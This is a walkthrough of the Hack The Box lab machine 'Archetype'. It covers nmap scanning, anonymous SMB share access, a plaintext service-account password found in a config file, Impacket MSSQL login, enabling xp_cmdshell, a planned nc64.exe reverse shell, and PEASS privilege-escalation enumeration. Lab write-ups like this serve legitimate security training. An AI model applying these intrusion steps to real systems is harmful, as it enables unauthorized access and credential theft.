Well done at reaching this point. From
now on boxes are becoming a bit more difficult in the context of steps, usage
of tools, and exploitation attempts as they start looking similar to the boxes
in the main platform of HTB. Starting with Archetype which is a Windows
machine, you can have a chance to exploit a misconfiguration in Microsoft SQL
Server, try getting a reverse shell, and get familiarized with the use of the Impacket tool in order to further attack some services.
Enumeration
Performing a network scan to detect what ports are open is
already known as an essential part of the enumeration process. This offers us
the opportunity to better understand the attacking surface and design targeted
attacks. As in most cases, we are going to use the famous Nmap tool.
┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.33.197
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 11:23 IST\
Nmap scan report for 10.129.33.197
Host is up (0.26s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
|_ssl-date: 2021-12-27T06:05:12+00:00; +10m43s from scanner time.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.76 seconds
┌──(mrdev㉿mrdev)-[~]
└─$
We found that SMB ports are open and also that a Microsoft
SQL Server 2017 is running on port 1433.
Enumerate Microsoft SQL server 2017 with the help of smbclient
We are going to enumerate the SMB with
the tool smbclient.
-N : No password
-L : This option allows you to look at what services are available on a server
┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -N -L \\\\10.129.33.197\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
We located a couple of interesting shares. Shares ADMIN$ and
C$ cannot be accessed as the Access Denied error states, however, we can try to
access and enumerate the backups shared by using the following command:
┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -N \\\\10.129.33.197\\backups
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 17:50:57 2020
.. D 0 Mon Jan 20 17:50:57 2020
prod.dtsConfig AR 609 Mon Jan 20 17:53:02 2020
5056511 blocks of size 4096. 2611130 blocks available
smb: \>
There is a file named prod.dtsConfig which seems like a
configuration one. We can download it to our local machine by using the get
command for further offline inspection.
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
By reviewing the content of this configuration file, we spot
in clear text the password of the user ARCHETYPE\sql_svc, which is M3g4c0rp123, for the host ARCHETYPE. With the provided credentials we just need a way
to connect and authenticate to the MS-SQL server.
Enumerate the ARCHETYPE using Impacket
Impacket tool includes a valuable Python script called
mssqlclient.py which offers such functionality. But first, we should better
understand what Impact is and how we can install it.
Visit the Impacket Github link by searching on Google, where you
can read all about this tool.
We provide the password we spotted previously in the
configuration file:
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
We successfully authenticated to the Microsoft SQL Server!
Foothold
After our successful connection, run help to find out the
options of our SQL shell. The help option describes the very basic functionalities it offers.
SQL>help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL>
Gain Foothold from SQL Shell
First, let me enable the XP command shell from 0 to 1. Then, run
reconfigure.
SQL> enable_xp_cmdshell;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL>
The whoami command output reveals that the SQL Server is
also running in the context of the user ARCHETYPE\sql_svc. However, this
account doesn't seem to have administrative privileges on the host.
Now, we will attempt to get a stable reverse shell. We will
upload the nc64.exe binary to the target machine and execute an interactive
cmd.exe process on our listening port. We can download the binary from GitHub.
Now copy this file to the htdocs of the XAMPP webserver.
Now Run the control panel and start the Apache web server. My Apache server is running
on port 8080.
In order to upload the binary in the target system, we need
to find the appropriate folder for that. We will be using PowerShell for this
task since it gives us much more features than the regular command prompt.
In
order to use it, we will have to specify it each time we want to execute it
until we get the reverse shell. To do that, we will use the PowerShell -c
command.
-c flag instructs the PowerShell to execute the command.
We will print the current working directory by using pwd
command.
PEASS-ng (Privilege Escalation Awesome Scripts SUITE new generation) is a collection of privilege escalation tools and techniques for Windows and Linux/Unix systems. It provides scripts and binaries that aid in the process of escalating privileges on compromised machines.
On the target machine, we will execute the wget command in
order to download the program from our system. We will use Powershell for all
our commands.
The output of the tool is long, here you can find out some
history, logs, and backups. From the output, we can observe that we have
SeImpersonatePrivilege, which is also vulnerable to juicy potato exploit.
However, we can first check the two existing files where
credentials could possibly be found.
As this is a normal user account as well as a service
account, it is worth checking for frequently accessed files or executed commands.
To do that, we will read the PowerShell history file, which is the equivalent
of .bash_history for Linux systems. The file ConsoleHost_history.txt can be
located in this directory.
Now, navigate to the folder where the PowerShell history is stored.
